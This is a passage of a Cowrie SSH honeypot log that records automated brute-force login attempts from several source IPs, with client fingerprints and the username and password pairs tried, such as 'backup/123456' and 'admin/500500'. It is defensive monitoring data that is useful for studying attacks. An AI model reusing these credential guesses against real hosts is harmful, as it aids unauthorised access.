bc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:23:49.391244Z","src_ip":"212.227.125.160","session":"611afa2a8405"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123456","message":"login attempt [backup/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T12:23:49.889683Z","src_ip":"212.227.125.160","session":"611afa2a8405"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:23:51.055796Z","src_ip":"212.227.125.160","session":"611afa2a8405"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33894,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ef40e4522e8","protocol":"ssh","message":"New connection: 212.227.125.160:33894 (1.2.3.4:22) [session: 9ef40e4522e8]","sensor":"my-vps","timestamp":"2025-08-28T12:24:28.496616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:24:28.497539Z","src_ip":"212.227.125.160","session":"9ef40e4522e8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:24:28.666622Z","src_ip":"212.227.125.160","session":"9ef40e4522e8"}
{"eventid":"cowrie.login.failed","username":"backup","password":"password","message":"login attempt [backup/password] failed","sensor":"my-vps","timestamp":"2025-08-28T12:24:29.269817Z","src_ip":"212.227.125.160","session":"9ef40e4522e8"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:24:30.439595Z","src_ip":"212.227.125.160","session":"9ef40e4522e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":7524,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c1b33046178","protocol":"ssh","message":"New connection: 212.227.125.160:7524 (1.2.3.4:22) [session: 0c1b33046178]","sensor":"my-vps","timestamp":"2025-08-28T12:24:43.587563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:24:43.588474Z","src_ip":"212.227.125.160","session":"0c1b33046178"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:24:43.676320Z","src_ip":"212.227.125.160","session":"0c1b33046178"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T12:24:44.085885Z","src_ip":"212.227.125.160","session":"0c1b33046178"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:24:45.185014Z","src_ip":"212.227.125.160","session":"0c1b33046178"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51728,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c7a0c9dd47d","protocol":"ssh","message":"New connection: 212.227.125.160:51728 (1.2.3.4:22) [session: 4c7a0c9dd47d]","sensor":"my-vps","timestamp":"2025-08-28T12:25:10.208773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:25:10.209894Z","src_ip":"212.227.125.160","session":"4c7a0c9dd47d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:25:10.375761Z","src_ip":"212.227.125.160","session":"4c7a0c9dd47d"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123456789","message":"login attempt [backup/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T12:25:10.866071Z","src_ip":"212.227.125.160","session":"4c7a0c9dd47d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:25:12.030359Z","src_ip":"212.227.125.160","session":"4c7a0c9dd47d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61708,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a480e3880c5","protocol":"ssh","message":"New connection: 217.72.205.35:61708 (1.2.3.4:22) [session: 2a480e3880c5]","sensor":"my-vps","timestamp":"2025-08-28T12:25:19.334693Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:25:19.336142Z","src_ip":"217.72.205.35","session":"2a480e3880c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56308,"dst_ip":"1.2.3.4","dst_port":22,"session":"458d0e7b0f8a","protocol":"ssh","message":"New connection: 212.227.125.160:56308 (1.2.3.4:22) [session: 458d0e7b0f8a]","sensor":"my-vps","timestamp":"2025-08-28T12:25:53.733716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:25:53.739576Z","src_ip":"212.227.125.160","session":"458d0e7b0f8a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:25:53.901699Z","src_ip":"212.227.125.160","session":"458d0e7b0f8a"}
{"eventid":"cowrie.login.failed","username":"backup","password":"12345","message":"login attempt [backup/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:25:54.572683Z","src_ip":"212.227.125.160","session":"458d0e7b0f8a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:25:55.741966Z","src_ip":"212.227.125.160","session":"458d0e7b0f8a"}
{"eventid":"cowrie.session.connect","src_ip":"37.143.61.47","src_port":57914,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfc5035fad98","protocol":"ssh","message":"New connection: 37.143.61.47:57914 (1.2.3.4:22) [session: bfc5035fad98]","sensor":"my-vps","timestamp":"2025-08-28T12:25:56.419619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:25:56.459682Z","src_ip":"37.143.61.47","session":"bfc5035fad98"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T12:25:56.460786Z","src_ip":"37.143.61.47","session":"bfc5035fad98"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:26:04.672895Z","src_ip":"37.143.61.47","session":"bfc5035fad98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42392,"dst_ip":"1.2.3.4","dst_port":22,"session":"92901570bffc","protocol":"ssh","message":"New connection: 212.227.125.160:42392 (1.2.3.4:22) [session: 92901570bffc]","sensor":"my-vps","timestamp":"2025-08-28T12:26:38.210841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:26:38.327585Z","src_ip":"212.227.125.160","session":"92901570bffc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:26:38.465852Z","src_ip":"212.227.125.160","session":"92901570bffc"}
{"eventid":"cowrie.login.failed","username":"backup","password":"12345678","message":"login attempt [backup/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T12:26:39.232525Z","src_ip":"212.227.125.160","session":"92901570bffc"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:26:40.397583Z","src_ip":"212.227.125.160","session":"92901570bffc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48629,"dst_ip":"1.2.3.4","dst_port":22,"session":"895afded5ce9","protocol":"ssh","message":"New connection: 212.227.235.229:48629 (1.2.3.4:22) [session: 895afded5ce9]","sensor":"my-vps","timestamp":"2025-08-28T12:26:48.316321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:26:48.317370Z","src_ip":"212.227.235.229","session":"895afded5ce9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:26:48.422367Z","src_ip":"212.227.235.229","session":"895afded5ce9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"777vlad","message":"login attempt [admin/777vlad] failed","sensor":"my-vps","timestamp":"2025-08-28T12:26:48.924313Z","src_ip":"212.227.235.229","session":"895afded5ce9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"6767","message":"login attempt [admin/6767] failed","sensor":"my-vps","timestamp":"2025-08-28T12:26:50.032103Z","src_ip":"212.227.235.229","session":"895afded5ce9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"6565","message":"login attempt [admin/6565] failed","sensor":"my-vps","timestamp":"2025-08-28T12:26:51.139187Z","src_ip":"212.227.235.229","session":"895afded5ce9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"500500","message":"login attempt [admin/500500] failed","sensor":"my-vps","timestamp":"2025-08-28T12:26:52.246819Z","src_ip":"212.227.235.229","session":"895afded5ce9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"369852147","message":"login attempt [admin/369852147] failed","sensor":"my-vps","timestamp":"2025-08-28T12:26:53.354366Z","src_ip":"212.227.235.229","session":"895afded5ce9"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:26:54.461903Z","src_ip":"212.227.235.229","session":"895afded5ce9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61865,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9ca7a11605c","protocol":"ssh","message":"New connection: 212.227.235.229:61865 (1.2.3.4:22) [session: c9ca7a11605c]","sensor":"my-vps","timestamp":"2025-08-28T12:27:01.963704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:27:01.964690Z","src_ip":"212.227.235.229","session":"c9ca7a11605c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:27:02.114421Z","src_ip":"212.227.235.229","session":"c9ca7a11605c"}
{"eventid":"cowrie.login.failed","username":"user","password":"southern","message":"login attempt [user/southern] failed","sensor":"my-vps","timestamp":"2025-08-28T12:27:02.816529Z","src_ip":"212.227.235.229","session":"c9ca7a11605c"}
{"eventid":"cowrie.login.failed","username":"user","password":"rusty1","message":"login attempt [user/rusty1] failed","sensor":"my-vps","timestamp":"2025-08-28T12:27:03.976804Z","src_ip":"212.227.235.229","session":"c9ca7a11605c"}
{"eventid":"cowrie.login.failed","username":"user","password":"punkin","message":"login attempt [user/punkin] failed","sensor":"my-vps","timestamp":"2025-08-28T12:27:05.114144Z","src_ip":"212.227.235.229","session":"c9ca7a11605c"}
{"eventid":"cowrie.login.failed","username":"user","password":"napass","message":"login attempt [user/napass] failed","sensor":"my-vps","timestamp":"2025-08-28T12:27:06.262455Z","src_ip":"212.227.235.229","session":"c9ca7a11605c"}
{"eventid":"cowrie.login.failed","username":"user","password":"marian","message":"login attempt [user/marian] failed","sensor":"my-vps","timestamp":"2025-08-28T12:27:07.403243Z","src_ip":"212.227.235.229","session":"c9ca7a11605c"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:27:08.565662Z","src_ip":"212.227.235.229","session":"c9ca7a11605c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40984,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ea2c40af628","protocol":"ssh","message":"New connection: 212.227.125.160:40984 (1.2.3.4:22) [session: 7ea2c40af628]","sensor":"my-vps","timestamp":"2025-08-28T12:27:22.165758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:27:22.166739Z","src_ip":"212.227.125.160","session":"7ea2c40af628"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:27:22.341966Z","src_ip":"212.227.125.160","session":"7ea2c40af628"}
{"eventid":"cowrie.login.failed","username":"backup","password":"qwerty","message":"login attempt [backup/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T12:27:22.871228Z","src_ip":"212.227.125.160","session":"7ea2c40af628"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:27:24.050122Z","src_ip":"212.227.125.160","session":"7ea2c40af628"}
